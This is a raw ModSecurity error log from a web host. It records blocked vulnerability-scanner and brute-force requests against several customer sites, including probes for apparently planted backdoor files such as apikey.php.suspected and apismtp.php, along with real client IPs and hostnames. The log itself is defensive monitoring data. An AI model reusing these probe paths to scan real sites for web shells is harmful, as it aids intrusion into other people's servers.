[Tue May 26 18:10:08.475272 2026] [security2:error] [pid 973439:tid 973664] [client 46.176.156.90:54056] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqABg9mKRpdEFs3BitgAAAF8"]
[Tue May 26 18:10:08.475305 2026] [security2:error] [pid 973439:tid 973664] [client 46.176.156.90:54056] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqABg9mKRpdEFs3BitgAAAF8"]
[Tue May 26 18:10:08.895850 2026] [security2:error] [pid 973439:tid 973667] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUqABg9mKRpdEFs3BiwgAAAGI"]
[Tue May 26 18:10:09.332414 2026] [security2:error] [pid 973439:tid 973644] [client 46.176.156.90:54093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqQBg9mKRpdEFs3BizgAAAEs"]
[Tue May 26 18:10:09.332519 2026] [security2:error] [pid 973439:tid 973644] [client 46.176.156.90:54093] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqQBg9mKRpdEFs3BizgAAAEs"]
[Tue May 26 18:10:09.332540 2026] [security2:error] [pid 973439:tid 973644] [client 46.176.156.90:54093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqQBg9mKRpdEFs3BizgAAAEs"]
[Tue May 26 18:10:09.741786 2026] [security2:error] [pid 973439:tid 973620] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUqQBg9mKRpdEFs3Bi1gAAADM"]
[Tue May 26 18:10:09.857048 2026] [security2:error] [pid 973439:tid 973602] [client 20.206.67.134:5130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/rcbvtrvr.php"] [unique_id "ahWUqQBg9mKRpdEFs3Bi2wAAACE"], referer: www.google.com
[Tue May 26 18:10:09.927011 2026] [security2:error] [pid 973439:tid 973615] [client 20.206.67.134:6470] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWUqQBg9mKRpdEFs3Bi3QAAAC4"]
[Tue May 26 18:10:10.169009 2026] [security2:error] [pid 973439:tid 973618] [client 46.176.156.90:54132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi5QAAADE"]
[Tue May 26 18:10:10.169089 2026] [security2:error] [pid 973439:tid 973618] [client 46.176.156.90:54132] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi5QAAADE"]
[Tue May 26 18:10:10.169113 2026] [security2:error] [pid 973439:tid 973618] [client 46.176.156.90:54132] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi5QAAADE"]
[Tue May 26 18:10:10.355094 2026] [security2:error] [pid 973439:tid 973645] [client 20.206.67.134:6480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/lzxyxcpp.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi7gAAAEw"], referer: www.google.com
[Tue May 26 18:10:10.381954 2026] [security2:error] [pid 973439:tid 973674] [client 82.76.238.33:61337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi6gAAAGk"]
[Tue May 26 18:10:10.382114 2026] [security2:error] [pid 973439:tid 973674] [client 82.76.238.33:61337] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi6gAAAGk"]
[Tue May 26 18:10:10.572122 2026] [security2:error] [pid 973439:tid 973653] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUqgBg9mKRpdEFs3Bi9QAAAFQ"]
[Tue May 26 18:10:10.576425 2026] [security2:error] [pid 973439:tid 973647] [client 20.206.67.134:6495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi9wAAAE4"]
[Tue May 26 18:10:10.576438 2026] [security2:error] [pid 973439:tid 973641] [client 130.44.202.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi8QAAAEg"], referer: https://www.anujtradingco.com/
[Tue May 26 18:10:11.000818 2026] [security2:error] [pid 973439:tid 973616] [client 46.176.156.90:54161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3BjCgAAAC8"]
[Tue May 26 18:10:11.000955 2026] [security2:error] [pid 973439:tid 973616] [client 46.176.156.90:54161] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3BjCgAAAC8"]
[Tue May 26 18:10:11.000989 2026] [security2:error] [pid 973439:tid 973616] [client 46.176.156.90:54161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqgBg9mKRpdEFs3BjCgAAAC8"]
[Tue May 26 18:10:11.081841 2026] [security2:error] [pid 973439:tid 973608] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUqgBg9mKRpdEFs3Bi-gAAACc"]
[Tue May 26 18:10:11.417115 2026] [security2:error] [pid 973439:tid 973606] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUqwBg9mKRpdEFs3BjDwAAACU"]
[Tue May 26 18:10:11.852894 2026] [security2:error] [pid 973439:tid 973572] [client 46.176.156.90:54189] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqwBg9mKRpdEFs3BjHQAAAAM"]
[Tue May 26 18:10:11.852991 2026] [security2:error] [pid 973439:tid 973572] [client 46.176.156.90:54189] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqwBg9mKRpdEFs3BjHQAAAAM"]
[Tue May 26 18:10:11.853010 2026] [security2:error] [pid 973439:tid 973572] [client 46.176.156.90:54189] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUqwBg9mKRpdEFs3BjHQAAAAM"]
[Tue May 26 18:10:12.261511 2026] [security2:error] [pid 973439:tid 973663] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUrABg9mKRpdEFs3BjKQAAAF4"]
[Tue May 26 18:10:12.676349 2026] [security2:error] [pid 973439:tid 973605] [client 46.176.156.90:54221] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrABg9mKRpdEFs3BjOAAAACQ"]
[Tue May 26 18:10:12.676502 2026] [security2:error] [pid 973439:tid 973605] [client 46.176.156.90:54221] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrABg9mKRpdEFs3BjOAAAACQ"]
[Tue May 26 18:10:12.676530 2026] [security2:error] [pid 973439:tid 973605] [client 46.176.156.90:54221] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrABg9mKRpdEFs3BjOAAAACQ"]
[Tue May 26 18:10:13.075428 2026] [security2:error] [pid 973439:tid 973608] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUrQBg9mKRpdEFs3BjQwAAACc"]
[Tue May 26 18:10:13.100356 2026] [security2:error] [pid 973439:tid 973497] [remote 125.99.184.138:39282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.184.99.125.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWUrABg9mKRpdEFs3BjPAAAajk"]
[Tue May 26 18:10:13.508496 2026] [security2:error] [pid 973439:tid 973683] [client 46.176.156.90:54252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrQBg9mKRpdEFs3BjUwAAAHI"]
[Tue May 26 18:10:13.508586 2026] [security2:error] [pid 973439:tid 973683] [client 46.176.156.90:54252] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrQBg9mKRpdEFs3BjUwAAAHI"]
[Tue May 26 18:10:13.508608 2026] [security2:error] [pid 973439:tid 973683] [client 46.176.156.90:54252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrQBg9mKRpdEFs3BjUwAAAHI"]
[Tue May 26 18:10:13.708729 2026] [security2:error] [pid 973439:tid 973512] [remote 109.228.50.118:43346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWUrQBg9mKRpdEFs3BjWAAAJUg"]
[Tue May 26 18:10:13.860149 2026] [security2:error] [pid 973439:tid 973587] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUrQBg9mKRpdEFs3BjTwAAABI"]
[Tue May 26 18:10:13.923093 2026] [security2:error] [pid 973439:tid 973659] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUrQBg9mKRpdEFs3BjYwAAAFo"]
[Tue May 26 18:10:14.391195 2026] [security2:error] [pid 973439:tid 973669] [client 20.206.67.134:7757] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWUrgBg9mKRpdEFs3BjdAAAAGQ"]
[Tue May 26 18:10:14.419962 2026] [security2:error] [pid 973439:tid 973690] [client 46.176.156.90:54280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrgBg9mKRpdEFs3BjeAAAAHk"]
[Tue May 26 18:10:14.420150 2026] [security2:error] [pid 973439:tid 973690] [client 46.176.156.90:54280] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrgBg9mKRpdEFs3BjeAAAAHk"]
[Tue May 26 18:10:14.420203 2026] [security2:error] [pid 973439:tid 973690] [client 46.176.156.90:54280] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrgBg9mKRpdEFs3BjeAAAAHk"]
[Tue May 26 18:10:14.830364 2026] [security2:error] [pid 973439:tid 973634] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUrgBg9mKRpdEFs3BjgQAAAEE"]
[Tue May 26 18:10:15.291415 2026] [security2:error] [pid 973439:tid 973683] [client 20.206.67.134:5174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahWUrwBg9mKRpdEFs3BjkAAAAHI"]
[Tue May 26 18:10:15.317798 2026] [security2:error] [pid 973439:tid 973672] [client 46.176.156.90:54318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrwBg9mKRpdEFs3BjkQAAAGc"]
[Tue May 26 18:10:15.317916 2026] [security2:error] [pid 973439:tid 973672] [client 46.176.156.90:54318] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrwBg9mKRpdEFs3BjkQAAAGc"]
[Tue May 26 18:10:15.317940 2026] [security2:error] [pid 973439:tid 973672] [client 46.176.156.90:54318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUrwBg9mKRpdEFs3BjkQAAAGc"]
[Tue May 26 18:10:15.689975 2026] [security2:error] [pid 973439:tid 973682] [client 130.44.202.223:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWUrwBg9mKRpdEFs3BjngAAAHE"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 18:10:15.780237 2026] [security2:error] [pid 973439:tid 973593] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUrwBg9mKRpdEFs3BjowAAABg"]
[Tue May 26 18:10:16.198041 2026] [security2:error] [pid 973439:tid 973669] [client 46.176.156.90:54352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsABg9mKRpdEFs3BjsAAAAGQ"]
[Tue May 26 18:10:16.198175 2026] [security2:error] [pid 973439:tid 973669] [client 46.176.156.90:54352] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsABg9mKRpdEFs3BjsAAAAGQ"]
[Tue May 26 18:10:16.198199 2026] [security2:error] [pid 973439:tid 973669] [client 46.176.156.90:54352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsABg9mKRpdEFs3BjsAAAAGQ"]
[Tue May 26 18:10:16.418463 2026] [security2:error] [pid 973439:tid 973663] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWUrwBg9mKRpdEFs3BjoQAAAF4"]
[Tue May 26 18:10:16.649006 2026] [security2:error] [pid 973439:tid 973676] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUsABg9mKRpdEFs3BjvgAAAGs"]
[Tue May 26 18:10:17.154195 2026] [security2:error] [pid 973439:tid 973594] [client 46.176.156.90:54395] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsQBg9mKRpdEFs3BjzAAAABk"]
[Tue May 26 18:10:17.154285 2026] [security2:error] [pid 973439:tid 973594] [client 46.176.156.90:54395] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsQBg9mKRpdEFs3BjzAAAABk"]
[Tue May 26 18:10:17.154313 2026] [security2:error] [pid 973439:tid 973594] [client 46.176.156.90:54395] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsQBg9mKRpdEFs3BjzAAAABk"]
[Tue May 26 18:10:17.590192 2026] [security2:error] [pid 973439:tid 973633] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUsQBg9mKRpdEFs3Bj0wAAAEA"]
[Tue May 26 18:10:17.976347 2026] [security2:error] [pid 973439:tid 973682] [client 20.206.67.134:5131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWUsQBg9mKRpdEFs3Bj2wAAAHE"]
[Tue May 26 18:10:18.062778 2026] [security2:error] [pid 973439:tid 973646] [client 46.176.156.90:54430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj3wAAAE0"]
[Tue May 26 18:10:18.062973 2026] [security2:error] [pid 973439:tid 973646] [client 46.176.156.90:54430] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj3wAAAE0"]
[Tue May 26 18:10:18.063010 2026] [security2:error] [pid 973439:tid 973646] [client 46.176.156.90:54430] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj3wAAAE0"]
[Tue May 26 18:10:18.468899 2026] [security2:error] [pid 973439:tid 973666] [client 46.176.156.90:53357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.bloggertarget.com"] [uri "/"] [unique_id "ahWUsgBg9mKRpdEFs3Bj5gAAAGE"]
[Tue May 26 18:10:18.893822 2026] [security2:error] [pid 973439:tid 973577] [client 20.206.67.134:3632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jhonweb.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahWUsgBg9mKRpdEFs3Bj9QAAAAg"]
[Tue May 26 18:10:19.023037 2026] [security2:error] [pid 973439:tid 973631] [client 46.176.156.90:54472] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 90.156.176.46.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWUsgBg9mKRpdEFs3Bj9gAAAD4"]
